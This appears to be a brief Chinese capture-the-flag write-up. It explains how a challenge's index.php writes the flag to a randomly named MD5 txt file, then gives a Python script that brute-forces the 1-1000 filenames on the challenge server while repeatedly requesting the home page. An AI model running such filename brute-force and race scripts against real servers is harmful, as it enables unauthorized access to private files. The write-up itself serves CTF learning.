题目说明:天下武功,唯快不破
1.打开链接后,页面如图所示
2.这应该是网站根目录下的index.php的源码,分析源码得知:
当访问index.php文件时,会将flag.php的内容写到一个txt文件里,
这个txt文件名为1到1000的一个随机数的md5加密结果,
其路径为根目录下的u目录下
3.编写python脚本爆破文件名,访问这个txt文件,不断刷新主页,增加成功概率
import requests
import random
import hashlib
def md5(str):
m = hashlib.md5()
m.update(str)
q = m.hexdigest()
return q
def sss():
for i in range(1,1000):
name = md5(str(i))
r02 = requests.get('http://106.75.26.211:3333/u/'+name+'.txt')
s = r02.status_code
if s == 200:
print r02.content
r01 = requests.get('http://106.75.26.211:3333')
sss()
4.不断尝试,get flag!
